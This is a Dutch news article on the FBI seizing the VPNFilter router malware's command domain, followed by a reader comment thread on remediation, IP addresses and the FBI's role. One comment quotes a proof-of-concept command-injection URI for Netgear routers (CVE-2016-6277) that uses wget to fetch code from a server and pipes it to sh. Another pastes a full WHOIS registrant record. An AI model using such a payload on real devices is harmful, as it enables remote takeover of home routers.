Gebruikers kunnen malware van router halen na inbeslagname c&c-server door FBI

Doordat de Amerikaanse inlichtingendienst FBI een command&control-server in beslag heeft genomen, is het mogelijk om de malware die in de afgelopen tijd een half miljoen gebruikers heeft getroffen, te deactiveren door de router te rebooten.

De malware bestaat uit verschillende delen. Het eerste deel is niet schadelijk en overleeft reboots, maar heeft instructies van een server nodig om de payload van het tweede en derde deel te installeren. Die delen overleven reboots niet. Nu de server die aanwijzingen geeft over waar het tweede en derde deel online te vinden zijn, offline is, is het gevaar geweken, schrijft The Daily Beast.

De FBI heeft toestemming gekregen van de rechter om van Verisign het domein ToKnowAll[.]com over te nemen, waardoor de malware voortaan contact maakt met servers van de FBI. De inlichtingendienst doet dat om ip-adressen van getroffen routers te verzamelen.

De malware heeft ook routers in Nederland getroffen, al is onbekend hoeveel. Op de site van Cisco's beveilingstak Talos staat meer informatie over de VPNFilter. De Oekraïense overheidsorganisatie SBU gelooft dat de Russische overheid achter de aanval zit, mogelijk voor een aanval tijdens de Champions League-finale zaterdag. Ook Cisco vermoedt dat de Russische staat achter de aanval zit.

Linksys	Mikrotik	Netgear	Qnap	TP-Link
E1200	1016	DGN2200	TS251	R600VPN
E2500	1036	R6400	TS439 Pro
WRVS4400N	1072	R7000
		R8000
		WNR1000
		WNR2000

Reacties (111)

111

108

Wijzig sortering

Ravefiend 24 mei 2018 09:43

Volgens de blog post New VPNFilter malware targets at least 500K networking devices worldwide van Talos is het dus moelijk voor hen om te bepalen hoe de hackers stage 1 op de routers / NAS devices hebben gekregen.

We are unsure of the particular exploit used in any given case, but most devices targeted, particularly in older versions, have known public exploits or default credentials that make compromise relatively straightforward. All of this has contributed to the quiet growth of this threat since at least 2016.

At the time of this publication, we do not have definitive proof on how the threat actor is exploiting the affected devices. However, all of the affected makes/models that we have uncovered had well-known, public vulnerabilities. Since advanced threat actors tend to only use the minimum resources necessary to accomplish their goals, we assess with high confidence that VPNFilter required no zero-day exploitation techniques.

Even snel gekeken naar de devices die men heeft opgelijst en voor wat betreft bv. de Netgear R700 / R8000 was er 1 remote code execution vulnerability eind 2016, nl. CVE-2016-6277 met een score van 9.3 (critical). Meer in specifiek betrof dit een "cgi-bin Command Injection" waarbij dus de enigste vereiste is dat de login page van de router toegankelijk (bv. via het internet).

Proof of concept staat ook beschreven op Rapid7 - Netgear R7000 and R6400 cgi-bin Command Injection , incl. source.

send_request_cgi(
'method' => 'GET',
'uri' => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
)

Daarom nog maar eens het belang om enerzijds de access tot de router zelf (admin/cli) zoveel mogelijk af te schermen, en zeker zo belangrijk om de laatste firmware te installeren ook al is je device al een paar jaar oud (ref. de R7000/R8000 zijn al sinds 2013/2014 op de markt).

[Reactie gewijzigd door Ravefiend op 22 juli 2024 20:51]

r5copa 24 mei 2018 13:28

Kom net dit tegen voor de R7000
Hotfix MD5

V 1.0.9.30

https://kb.netgear.com/00...-Version-1-0-9-30-Hot-Fix

G. Sterk @r5copa • 24 mei 2018 14:18

Wat deze Fix fixed weet ik niet maar deze is van 26-04-2018.
Lijkt mij niet dat deze fix deze malware fixed.

r5copa @G. Sterk • 24 mei 2018 14:37

Lijkt me sterk dat die van april is ...
Versie is hoger dan laatste firmware.
MD5 vervangen voor andere type.

Update ...toch wel van eind April.
V 1.0.9.28 is van begin April .
Waren ze er mooi optijd bij.

[Reactie gewijzigd door r5copa op 22 juli 2024 20:51]

Harper @r5copa • 24 mei 2018 17:36

Bedankt, ben altijd een beetje huiverig met betasoftware, maar de update verliep probleemloos

The Zep Man

Beveiliging en antivirus
Malware

24 mei 2018 07:35

OK. En wat zorgt ervoor dat deze routers niet opnieuw geïnfecteerd worden?

useruser @The Zep Man • 24 mei 2018 07:41

OK. En wat zorgt ervoor dat deze routers niet opnieuw geïnfecteerd worden?

Niets. Sterker nog, als ik het zo lees blijft iedereen geinfecteerd aangezien stage1 persistent is, maar niet "schadelijk". Het ontoegankelijk maken van de C&C server is een goede stap, maar een aanvaller kan nog steeds handmatig een connectie maken met een geinfecteerde router.

Zie deze afbeelding voor wat meer info.

Verwijderd @useruser • 24 mei 2018 09:19

Kan je niet gewoon je firmware opnieuw erover flashen, dan is het 1e persistent deel toch ook weg, of ben ik mis ?

xrf @Verwijderd • 24 mei 2018 10:31

Zeker, dat is ook het advies van Cisco:

We recommend that:
Users of SOHO routers and/or NAS devices reset them to factory defaults and reboot them in order to remove the potentially destructive, non-persistent stage 2 and stage 3 malware.
[...]

[Reactie gewijzigd door xrf op 22 juli 2024 20:51]

Maurits van Baerle @Verwijderd • 24 mei 2018 10:25

In veel (of misschien wel alle gevallen) wel ja. Maar je moet de gemiddelde gebruiker niet vragen de firmware van hun router opnieuw te flashen. Dan is de schade waarschijnlijk groter dan de infectie zelf. Een reboot is daarentegen meestal goed te doen.

the_stickie @Verwijderd • 24 mei 2018 11:49

Ja, maar zolang er geen geupdate firmware beschikbaar is, blijft het apparaat kwetsbaar voor een (te verwachten) nieuwe aanval.

WillySis @useruser • 24 mei 2018 09:19

Dat zit allemaal heel degelijk in elkaar!
Eigenlijk heeft de organisatie achter deze mallware nog altijd de controle over de routers. Alleen moet men nu een alternatieve weg gebruiken, die alleen de eerste stap nodig heeft om de router aan te spreken. Als men via die weg een nieuw adres voor een tweede server kan doorgeven, heeft men het netwerk weer snel hersteld.

Wellicht is het terugzetten naar fabrieksinstellingen of het installeren van alternatieve firmware een beter alternatief (als dat tenminste werkt).

FreshMaker @WillySis • 24 mei 2018 09:48

Wellicht is het terugzetten naar fabrieksinstellingen of het installeren van alternatieve firmware een beter alternatief (als dat tenminste werkt).

Dat was ook de conclusie in het initiele artikel ( via Talos )
Een reboot / factoryreset zou in ieder gevaal een deel verhelpen

NaliXL @WillySis • 24 mei 2018 11:21

Het is haast onmogelijk dat het door @useruser gelinkte schema klopt. Als de routers inderdaad weer overgenomen kunnen worden door het simpelweg verzenden van een packet, dan zou dit al lang gebeurd zijn. Dan zou de FBI hier ook van op de hoogte zijn en zou men niet zo'n statement en publique maken. Immers, een packet verzenden, hoe eenvoudig kun je het maken?

the_stickie @NaliXL • 24 mei 2018 11:47

Die afbeelding kom rechtstreeks van Talos die de malware hebben geanalyseerd. Mij lijkt het dus zo goed als zeker dat ze klopt.
Overigens zijn de apparaten in kwestie veelal nog gewoon kwetsbaar, dus isver niets dat de aanvallers weerhoudt een nieuwe aanval op te zetten met een ander c&c mechanisme.

Paultje3181 @NaliXL • 24 mei 2018 12:57

Omdat ze dat pakket waarschijnlijk kunnen loggen en zo kunnen achterhalen waar het vandaan komt en dus weten waar de aanval vandaan komt?
Kwestie van nieuwe hack erin zetten. Lastige is wel dat de routers een ervoor nodig hadden om te laten werken...

NaliXL @Paultje3181 • 24 mei 2018 18:34

De gemiddelde hacker huurt een stukje botnet om zo'n taak uit te voeren. Vrijwel niet te traceren.
Bovendien is het waarschijnlijk al vanaf 1 pc binnen 5 minuten gepiept om alle geïnfecteerde routers zo'n packet te sturen, mits de aanvallers een database bijhielden met ip adressen van de betreffende routers. Zo niet, kunnen ze het alsnog at random doen binnen een uurtje.

WillySis @NaliXL • 24 mei 2018 13:23

Haast onmogelijk is dus toch mogelijk.
Aan het instellen van een nieuwe server voor de tussenstap zitten nu wel risico's. De FBI zal dat ongetwijfeld loggen en proberen de verzender te achterhalen. Natuurlijk kan je de communicatie via vpn servers laten lopen, maar het blijft een risico wat men niet graag loopt. Het pakket moet ook nog eens naar elke geïnfecteerde router worden gestuurd. Al met al is er heel wat dataverkeer nodig (dus hoog risico) om het netwerk weer volledig onder controle te krijgen.
De kans dat een klein deel van de routers zo nu en dan even misbruikt wordt is wel aanwezig.

Mijn router staat (gelukkig) niet in de lijst, maar ik zou dan toch maar even een factory-reset doen.

burne @useruser • 24 mei 2018 08:13

Moet je alleen even de domeinnaam waarop de C&C-server gezocht word af zien te pakken van de FBI.

-- aanvulling --

Even voor de duidelijkheid: toknowall.com is al het backup-mechanisme. De primaire vector voor het afleveren van de stage-2 malware is een stel photobucket-accounts.

Routers met stage-1 erop zijn niet meer vulnerable voor de exploit waarmee stage-1 in eerste instantie geinstalleerd is, dus wat nu in het FBI-botnet zit is op dit moment alleen via de Photobucket-accounts en toknowall.com te exploiteren, en in de huidige stage-1 zit geen malware, enkel een infector en C&C.

Als je nu een ongepatchde firmware terug zou zetten zou een ander je router opnieuw kunnen infecteren, maar als je router al geinfecteerd is kan nu enkel de FBI er iets mee.

Blijkbaar hebben mensen alleen naar het plaatje gekeken en niet de FBI FLASH gelezen.

[Reactie gewijzigd door burne op 22 juli 2024 20:51]

hcQd @burne • 24 mei 2018 08:15

Je hebt blijkbaar niet naar het plaatje gekeken, met name het pad backup2.

Brummetje

@hcQd • 24 mei 2018 08:44

Dat is als de verbinding mislukt... Nu lijkt dat natuurlijk wel het geval te zijn maar misschien heeft de FBI wel een server staan die de requests afhandelt waardoor de routers denken dat het goed gaat.

nixan @burne • 24 mei 2018 08:21

Of je moet de FBI zijn...

MoonWatcher @burne • 24 mei 2018 08:42

Of met DNS spoofing de router zo gek zien te krijgen dat hij met een ander IP gaat verbinden. ( die van jou met je eigen c&c servertje )

Hoe dan ook, het offline halen helpt wel mee de concrete veiligheid te verbeteren en is een goed signaal van de FBI naar internet criminelen. Uiteraard blijft het een drupal op een gloeiende plaat maar je kunt ook niet alles laten gaan.

scartissue

@burne • 24 mei 2018 09:03

Dan zit je natuurlijk nog wel met het probleem dat de beveiligingsgaten in die routers nog niet gedicht zijn en ze zo dus opnieuw geïnfecteerd kunnen worden waardoor de nieuwe mallware naar nieuwe servers verwijst. Het blijft toch redelijk bizar dat zoveel consumentenrouters anno 2018 nog steeds geen automatische beveiligingsupdates krijgen...

kuurtjes @useruser • 24 mei 2018 08:43

Lijkt erop dat de FBI nu een botnet heeft van een half miljoen aparaten. Opschonen zou trouwens tegen Amerikaanse inlichtingen diensten gaan, die hebben liever toegang.

SkiFan @kuurtjes • 24 mei 2018 09:55

FBI is geen inlichtingendienst a la CIA of NSA.

kuurtjes @SkiFan • 24 mei 2018 12:44

Alsof zij niet onder 1 hoedje spelen...

SkiFan @kuurtjes • 24 mei 2018 12:53

Is hier absoluut niet nodig. Die routers leveren geen gegevens op die de providers al niet kunnen verschaffen.

freaky @SkiFan • 24 mei 2018 20:42

Da's niet correct. Die router zit ook in het interne netwerk, je ISP (tenzij het hun router is) normaliter niet.

Yzord @kuurtjes • 24 mei 2018 12:55

Nee, wonderbaarlijk genoeg kunnen ze elkaar niet uitstaan.

WimmieV @kuurtjes • 24 mei 2018 13:07

Ja,
Ze 'spelen' allemaal onder één hoedje, de hele wereld.
Alleen om 'jou' in de gaten te houden.

Jouw postbode, de KGB en de overbuurman doen daar ook aan mee.
Dat besef je toch wel hè ?

kuurtjes @WimmieV • 24 mei 2018 13:15

Goh. Was maar een grapje hoor.

Ik ben solipsistisch dus voor mij maakt het allemaal zelfs niet meer uit.

WimmieV @kuurtjes • 25 mei 2018 17:06

Goh. Was maar een grapje hoor.
Ik ben solipsistisch dus voor mij maakt het allemaal zelfs niet meer uit.

Dat zouden meer mensen moeten hebben 🤔 🙂

FreshMaker @useruser • 24 mei 2018 08:57

Uit het artikel van gisteren bleek dat de infectie door exif data komt.
Dan ga jij linken naar een plaatje .... ?

useruser @FreshMaker • 24 mei 2018 09:37

Uit het artikel van gisteren bleek dat de infectie door exif data komt.
Dan ga jij linken naar een plaatje .... ?

De infectie komt niet door exif data, de malware gebruikt exif data om te communiceren. Buiten dat, ja ik gebruik een afbeelding. Ik had ook naar een URL kunnen linken waar iets van malicious javascript op draait. Of had je liever een geinfecteerde PDF gehad? Doc bestand? Je kunt het zo gek niet bedenken of je kunt er een virus in stoppen.

xrf @useruser • 24 mei 2018 10:58

Ook het opmerken waard in dat overzicht is de Tor-plugin waarmee malware verbinding houdt met de C&C-server via het Tor-anonimiseringsnetwerk.

Deze plugin overleeft router-herstarts weliswaar niet, maar zolang de router aan blijft hebben geïnfecteerde routers via dit kanaal nog steeds verbinding met de C&C en kunnen ze ook een nieuwe configuratie ontvangen die geen gebruik maakt van de in beslag genomen domeinnaam of de inmiddels verwijderde Photobucket-bestanden.

Splorky @The Zep Man • 24 mei 2018 08:01

De routers zijn nu nog steeds geïnfecteerd, maar nu hebben de hackers geen controle meer maar kan de Amerikaanse inlichtingen dienst er gebruik van maken.

Gelukkig dat de Inlichtingen dienst van [noem corrupt land] niet eerder naar de rechter is gegaan om het domein over te nemen.

[edit]
Het zou de FBI sieren om fabrikanten de mogelijkheid te geven via de geïnfecteerde router een software update binnen te laten halen en uit te voeren die niet kwetsbaar is voor de malware (want wat houdt hackers tegen om het zelfde trucje uit te halen maar dan met een ander domein).

[Reactie gewijzigd door Splorky op 22 juli 2024 20:51]

xrf @Splorky • 24 mei 2018 10:37

Gelukkig dat de Inlichtingen dienst van ~[noem corrupt land] niet eerder naar de rechter is gegaan om het domein over te nemen.

Dat komt omdat het .com domein nog steeds officieel eigendom is van de VS. De FBI kan dus bij de Amerikaanse rechter afdwingen dat een domeinnaam wordt overgedragen, maar de politie van Verweggistan heeft geen poot om op te staan.

[Reactie gewijzigd door xrf op 22 juli 2024 20:51]

hcQd @Splorky • 24 mei 2018 08:27

De FBI zou heel simpel via KnowItAll een commando naar de routers kunnen sturen de stage1 weer te verwijderen. Juridisch zit dit echter vol haken en ogen.

Verwijderd @hcQd • 24 mei 2018 10:09

Ik wil geen firmware die door handen van de fbi gaat. Los van de angst die ons wordt aangepast en geheel gebaseerd op historische feiten, heb ik meer angst voor de VS dan Rusland. Van het gebruik van kernwapens tot afluisterapparatuur in het Europees parlement, het overwerken van democratisch gekozen leiders en vervangen van dictators. Nee, goed en kwaad bestaat niet, enkel zij die te veel macht en invloed hebben zijn een gevaar. Basisprincipe van democratie toch?

[Reactie gewijzigd door Verwijderd op 22 juli 2024 20:51]

trisje @Verwijderd • 24 mei 2018 12:26

Dat betreft kan je beter Putin als leider hebben. Die zorgt er teminsten voor dat we wat te kiezen hebben
En hij wordt al meer dan 18 jaar gekozen niet
Rusland is ook erg welvarent homo rechten gaat toch ook prima. Je kan alles openlijk zeggen op tv. Ja dat betreft hebben de westelijke landen nog al wat te verbeteren.

trisje @Splorky • 24 mei 2018 08:28

ik zie niet in waaarom fabrikante niet de mogelijkheid hebben om de routers een nieuwe filmware versie te maken. Dat de eigennaren daar niets mee doen is een ander verhaal. automatisch een firmware update er doorgheen gooien is ook niet altijd wenselijk.

Titan_Fox @The Zep Man • 24 mei 2018 09:14

Andere router aanschaffen of hopen dat de fabrikant met een firmware update komt die het probleem oplost.

MrBreaker @The Zep Man • 24 mei 2018 07:38

Spanning er af laten

AmigaWolf @The Zep Man • 24 mei 2018 14:13

OK. En wat zorgt ervoor dat deze routers niet opnieuw geïnfecteerd worden?

Precies, en door de FBI zelf, een hele mooie backdoor

Bierkameel 24 mei 2018 09:55

Vreemd om MikroTik in dit lijstje te zien, ik heb even gekeken en het zijn allemaal CCR's, ik heb zelf een RB3011 en die is niet besmet, Ik neem aan dat RouterOS tussen CCR's en RB's hetzelfde is?

Vaudtje @Bierkameel • 24 mei 2018 10:08

De lijst van Talos is inderdaad nogal vaag, want ze noemen drie apparaatnummers onder de titel 'version'.
Volgens MikroTik zelf is de vulnerability al een tijd gedicht (en dat in RouterOS, dus alle apparaten waren kwetsbaar), en kun je je apparaat opschonen door te upgrades naar de laatste versie: https://forum.mikrotik.co...&t=134776&hilit=Vpnfilter

Je kunt zelf verder als MikroTik gebruiken niet zien of je apparaat geinfecteerd is: https://forum.mikrotik.com/viewtopic.php?f=21&t=132499

[Reactie gewijzigd door Vaudtje op 22 juli 2024 20:51]

t-force

@Bierkameel • 24 mei 2018 12:20

Volgens Mikrotik gaat het om alle routers met RouterOS ouder dan 6.38.5.
Als je je Mikrotik update met de laatste versie, verwijderd deze actie ook alle eventuele besmettingen.

Zorg er in ieder geval voor dat management interfaces goed beveiligd zijn, dit kun je in Mikrotik routers makkelijk regelen,

mjl 24 mei 2018 07:37

Fijn dat dit een deel oplost, maar hoe weet je als gebruiker nou of je überhaupt geïnfecteerd bent?

Keypunchie

Malware

@mjl • 24 mei 2018 07:50

Wel of niet geinfecteerd maakt niet uit voor de stappen die je het beste kunt nemen als je je ook maar in de verte zorgen maakt.

1. reboot
2. werk je router-software bij
3. zet remote access / beheer via internet of hoe die functie ook heet uit.

Voor zover ik het Talos-stuk begrijp, betreft het in hoge mate doorgaans oudere routers met hoofdzakelijk verouderde software-versies met known exploits.

SinergyX @Keypunchie • 24 mei 2018 09:46

Je zat in dat andere bericht zulke vage berichten ook aal neer te gooien, maar hoe kom jij aan de tag malware? Het staat zelfs in het nieuwsbericht:

De malware bestaat uit verschillende delen. Het eerste deel is niet schadelijk en overleeft reboots, maar heeft instructies van een server nodig om de payload van het tweede en derde deel te installeren

Een reboot helpt dus niets.

En dan

Wel of niet geinfecteerd maakt niet uit

Even serieus? Dat lijkt me dus wel van belang, als ik dus met een router (en behoorlijk prijzige ook) zit die blijkbaar open staat tot vrij 'uploaden' van malware die volgens Talos al een tijdje publiekelijk bekend zijn, dan vraag ik me af waarom ik dat ding nog heb.

Maargoed, POC
https://www.rapid7.com/db...netgear_r7000_cgibin_exec
firmware version 1.0.7.2_1.1.93
Hier is dus enigszins uit aan te nemen dat als jij zit op deze versie of ouder, ze deze exploit hebben gebruikt, maar niets over nieuwe exploits. Huidige zit dan we op 1.0.9, maar neem aan dat ze niet precies aangeven welke exploits ze fixen bij welke firmware.
Laatste versie van bv de R7000 is 1.0.9.28 van maart 2018, dus daarmee heb je ook nog geen veiligheid.

[Reactie gewijzigd door SinergyX op 22 juli 2024 20:51]

mjl @Keypunchie • 24 mei 2018 07:59

Ja, en de domeinen in kwestie aan je pihole e.d. toevoegen zal ook helpen in dat de FBI je ip adres niet gaat verzamelen

marcieking

@mjl • 24 mei 2018 09:18

Maar dan moet je PiHole aan de WAN-kant van je router zitten, toch? Hang je die niet meestal aan de LAN zijde?

mjl @marcieking • 24 mei 2018 20:26

Pi hole zit aan de lan zijde van de wan zijde

Wegens geen bridge ondersteuning van het kon modem zit de pihole aan de lan zijde van het modem, welke aan de wan zijde van de router zit.

An sich helpt het voor een NAS wel, die zit ook aan de lan zijde. QNAP nassen zijn ook getroffen.

[Reactie gewijzigd door mjl op 22 juli 2024 20:51]

Lord Anubis @mjl • 26 mei 2018 16:07

Ja, over de QNAP TS439A, ben eigenlijk benieuw of daar iets meer over bekend is.

iemand? Kan er niets over vinden.

Pietervs @Keypunchie • 24 mei 2018 10:10

En dan de realiteit:
2: de fabrikant van mijn router (Linksys) heeft al 2 jaar geen updates uitgegeven voor mijn router. DD-WRT heeft hier geen firmware voor. Nu staat mijn router gelukkig niet op de lijst van getroffen modellen, maar helemaal happy wordt je daar niet van natuurlijk.
Dat geldt voor veel fabrikanten en modellen. Daarnaast: de niet-Tweakers zullen een update van hun router niet kunnen of durven uit te voeren.
3. Deze hoort gewoon uit te staan, er is eigenlijk geen enkele reden om die aan te hebben staan. Hooguit een tip voor het "handige neefje" die af en toe wat helpt

Blijft dus alleen optie 1 over: reboot... maar zoals SinergyX al opmerkt is het twijfelachtig of dat dat werkelijk helpt...

[Reactie gewijzigd door Pietervs op 22 juli 2024 20:51]

Keypunchie

Malware

@Pietervs • 24 mei 2018 11:33

Baat het niet, dan schaadt het niet. Snap niet waarom er zo kriegelig op gereageerd wordt.

In de andere thread had ik ook nog een extra stap: koop een nieuwe router

de niet-Tweakers zullen een update van hun router niet kunnen of durven uit te voeren.

Ik vind, maar dat is een heel andere discussie hoor, dat je als Tweaker ook als familie-en-vrienden CIO hoort te opereren.

Ik ga bijvoorbeeld +- 1x maand bij mijn ouders langs en controleer altijd meteen ff de update-status van bekende zwakke plekken. Vroeger was het vooral: is de anti-virus bijgewerkt en de nieuwste versie van Flash. Tegenwoordig is het vooral: zijn hun mobiele devices bijgewerkt en is hun router up-to-date.

Uiteraard heb ik wel auto-install dingetjes staan voor zover mogelijk, maar voldoende apparaten hebben inderdaad een handeling nodig. Die kan ik! Dus die doe ik!

Ik vind de reactie van SinergyX en jou zo getuigen van 'learned helplessness'. Alleen maar de problemen willen zien. Hoe moeilijk (en onschadelijk!) is het advies aan mensen te geven om hun router een keertje te rebooten?

[Reactie gewijzigd door Keypunchie op 22 juli 2024 20:51]

Bitmaster @Keypunchie • 24 mei 2018 12:12

$_/-\o_$

Pietervs @Keypunchie • 24 mei 2018 15:57

Oh, natuurlijk help ik vrienden en familie. En ongetwijfeld zal SinergyX dat ook doen.
Maar dat wil niet zeggen dat ik van alle vrienden en familie in beeld heb welke routers of modems zij hebben, jij wel?

Bedoeling was niet om kriegelig te reageren, maar enig realisme mag ook wel: lang niet iedereen kent een Tweaker

useruser 24 mei 2018 07:36

Domain Name: TOKNOWALL.COM
Registry Domain ID: 1987432426_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.internet.bs
Registrar URL: http://www.internetbs.net
Updated Date: 2017-05-04T14:29:26Z
Creation Date: 2015-12-15T12:07:48Z
Registrar Registration Expiration Date: 2018-12-15T12:07:48Z
Registrar: Internet Domain Service BS Corp.
Registrar IANA ID: 2487
Registrar Abuse Contact Email: abuse@internet.bs
Registrar Abuse Contact Phone: +1.5167401179
Reseller:
Domain Status: clientTransferProhibited - http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Hew Donnatan
Registrant Organization: Earthworks Yard Maintenance
Registrant Street: 88 Wressle Road
Registrant City: Plumley
Registrant State/Province: Plymouth
Registrant Postal Code: WA16 5RJ
Registrant Country: GB
Registrant Phone: +44.4407765840844
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: hew241985@gmx.com
Registry Admin ID:

Earthworks Yard Maintenance == FBI?

Johan9711 @useruser • 24 mei 2018 07:41

Ik denk dat er nog iets achter komt. Staat hier voor niets "[.]"

useruser @Johan9711 • 24 mei 2018 07:45

Er staat [.] om te voorkomen dat mensen er achterloos op klikken. Is standaard wanneer je linkt naar malicious domains of een URL naar een virus o.i.d.

[Reactie gewijzigd door useruser op 22 juli 2024 20:51]

MrNGm @Johan9711 • 24 mei 2018 07:46

Het gebruik van '[.]' in een domeinnaam is een manier om URL-parsers de URL niet te laten parseren (en er een linkje van te maken).

Equator Crew Council @Johan9711 • 24 mei 2018 07:47

Ik denk eerder dat dat is gedaan om er geen link van te maken, en minder snel mensen naar deze site te laten gaan.

bevgrad @useruser • 24 mei 2018 07:59

Je vind wel creepy dingen als je daarop googled.

Een facebook pagina zonder activiteit of likes
https://www.facebook.com/...ntenance-444976468856143/

Julie Murphy werkt er blijkbaar als Cardiac and Vascular Nurse
https://www.quora.com/Why...l-making-a-gargling-sound

Olivier Boyland uit Nederland zou er als journalist werken
https://www.linkedin.com/in/olivier-boyland-15b99592/

Peter Parks Railroad signal operator at Earthworks Yard Maintenance upload een boek genaamd "ADHD effects on marriage."
https://www.slideshare.ne...teps-trial-ebook-74373173

Kan er veel in zoeken maar denk dat het een random generated company name is die voor spam en scripts wordt gebruikt.

useruser @bevgrad • 24 mei 2018 08:02

Welk hoveniersbedrijf heeft er nou geen vasculair verpleegkundige in dienst

Call of Duty @bevgrad • 24 mei 2018 08:33

Vet dat je dit opzoekt

Dit soort praktijken worden natuurlijk ook door andere partijen opgezet. Hoewel ik wel zou denken dat bij het opzetten van een fake front store bij de FBI de functies en bedrijvigheid overeen zouden moeten komen. Alleen die beantwoording van bij Quora begrijp ik niet helemaal, waarom die naam daar verspreiden? Puur voor de SEO / geloofwaardigheid van de company?

Toolmaker @bevgrad • 24 mei 2018 11:49

Ze hebben ook 7 vacatures openstaan met een wel erg lange inschrijftermijn:
http://www.dignityrecruit...rks-yard-maintenance.html

Verzekeringsagent, reisagent, event manager, general manager, legal officer, senior accountant en business model analyst. Diverse job openings hebben afwijkende bedrijfsomschrijvingen. Bijzonder wel.

[Reactie gewijzigd door Toolmaker op 22 juli 2024 20:51]

sehnugr @useruser • 24 mei 2018 07:47

Gezien de "Updated Date" nog staat op vorig jaar, denk ik eerder dat het nog steeds de hackers zijn.

useruser @sehnugr • 24 mei 2018 07:57

Ha, goed punt. Was mij nog niet opgevallen!

hcQd 24 mei 2018 07:41

Ik vraag me af of dit voldoende is, de malware kan ook worden aangestuurd door direct contact van C&C naar de geïnfecteerde router. Als een router al eens eerder contact heeft opgenomen met C&C is zijn IP-adres daar natuurlijk bekend.

Blokker_1999

Malware
Beveiliging en antivirus

@hcQd • 24 mei 2018 07:51

Dynamische IPs zorgen ervoor dat die lijst snel verouderd.

useruser @Blokker_1999 • 24 mei 2018 07:58

Dynamische IPs zorgen ervoor dat die lijst snel verouderd.

Op zich heb je een punt, maar zo dynamisch zijn die IP adressen niet. Veel mensen, in ieder geval in west-europa hebben minstens een jaar hetzelfde IP adres.

the_stickie @useruser • 24 mei 2018 12:02

Dat heeft rechtstreeks te maken met hoe dhcp werkt. Al in de DISCOVERY fase kan een client vragen naar zijn eigen laatst bekende IP. Als dat (nog) beschikbaar is, zal dat het ip zijn dat in het OFFER zit.

Dit is zo omdat het super onhandig zou zijn dat elke renewal of glitch een ander IP zou opleveren; dat betekent niet alleen dat alle bestaande connecties ongeldig worden, maar ook dat gecachte data (onder meer dns) ongeldig wordt.

Je krijgt in principe alleen een ander IP na een release (omdat de client niet meer om dat IP vraagt), of nadat je leasetime verstreken is en je IP al aan een ander apparaat werd toegewezen.

Edit: @computerjunky DHCP werkt voordat je een ip hebt, dus is het MAC adres de enige manier om je te identificeren. Als je dat verandert, staat de lease zelfs nog open met het oude IP/MAC, en krijg je dus _sowieso_ een ander IP.
Eigenlijk is het aangewezen éérst netjes een release te doen, zodat je IP weer in de pool kan. Het Windows OS doet dat afaik voor je. In dat geval is het terugkrijgen van hetzelfde IP kwestie van toeval, maar niet onmogelijk. Zeker als de client specifiek weer om hetzelfde ip vraagt bij de discovery!

[Reactie gewijzigd door the_stickie op 22 juli 2024 20:51]

qless @useruser • 24 mei 2018 08:37

Iedereen in .be die bij proximus zit heeft elke 36 uur een ander ip adres... Edpnet/Telenet blijft wel langer.

zanza006 @qless • 24 mei 2018 09:52

Thuis heb ik telenet. En het IP is al jaren het zelfde. Ik heb al minstens 3jaar het zelfde IP adress.

computerjunky @useruser • 24 mei 2018 11:22

Mac adressen zijn in veel situaties gelinked aan het eerst mac adres binnen de voordeur. Dus of de modem router combo of de vaste pc bij een directe vervinding of de router.
Verander je dit mac adres of hang je er een andere router aan en reboot je de modem dan krijg je een ander ip.
Bij ziggo word het het aan het mac gelinkte ip adres voor onbekende tijs gelinkt aan het mac adres. Dus als je wisselt naar een andere router en later weer terug krijg je weer hetzelfde ip terug.
Storingen of werkzaamheden zijn de enige andere manier waarop je een ander ip krijgt.

mjl @Blokker_1999 • 24 mei 2018 08:00

Meeste IP's bij nederlandse ISP's is redelijk stabiel...

the_stickie @mjl • 24 mei 2018 12:11

Meeste IP's bij nederlandse ISP's in netwerken met standaard dhcp zijn redelijk stabiel...

xrf @Blokker_1999 • 24 mei 2018 10:45

Dan nog is het met een groot genoeg botnet of een server met flink wat bandbreedte wel te doen om alle IPv4-adressen te proberen of de backdoor aanwezig is. Nadeel is wel dat je op die manier onvermijdelijk in de gaten loopt.

TunefulDJ_Mike 24 mei 2018 07:41

Moet Amerikaanse inlichtingendienst niet zijn Federale Politie. FBI is voorzover ik weet primair geen inlichtingendienst.

Keypunchie

Malware

@TunefulDJ_Mike • 24 mei 2018 07:51

De FBI heeft naast een politie-taak ook contra-spionage als taak en kan je in die zin als een inlichtingendienst beschouwen.

De taakverdeling is grofweg dat de CIA in het buitenland opereert, terwijl de FBI binnen de VS jurisdictie heeft.

TunefulDJ_Mike @Keypunchie • 24 mei 2018 07:56

Wat je zegt klopt deels maar de tegenhangers van de CIA zijn toch eerder het Department of Homeland Security en de National Security Agency. Een daarvan staat als het goed is ook bekend als een inlichtingendienst.

Keypunchie

Malware

@TunefulDJ_Mike • 24 mei 2018 08:10

Als het niet past in jouw wereldbeeld van wat een inlichtingendienst is, hoef je ze niet zo te noemen.

Zelf zeggen ze dit:
https://www.fbi.gov/about en https://www.fbi.gov/about/faqs/what-is-the-fbi
"Today's FBI is an intelligence-driven and threat-focused national security organisation with both intelligence and law enforcement responsibilities".

Hoe je DHS kunt beschouwen: die doet de de beveiliging/blauw op straat. FBI doet de recherche.

De NSA is een tegenhanger van de CIA in de zin dat NSA alleen SIGINT (analyse van berichten en communicatie) doet, en CIA doet HUMINT (inzet van mensen en gebruik van informanten).

De NSA mag geen binnenlandse inlichtingen verzamelen! Vanwege internet is dat onderscheid nogal vaag geworden en worden veel gegevens via sleepnetten toch binnengehaald, maar in principe (en bij wet) is de NSA een inlichtingendienst gericht op het buitenland.

[Reactie gewijzigd door Keypunchie op 22 juli 2024 20:51]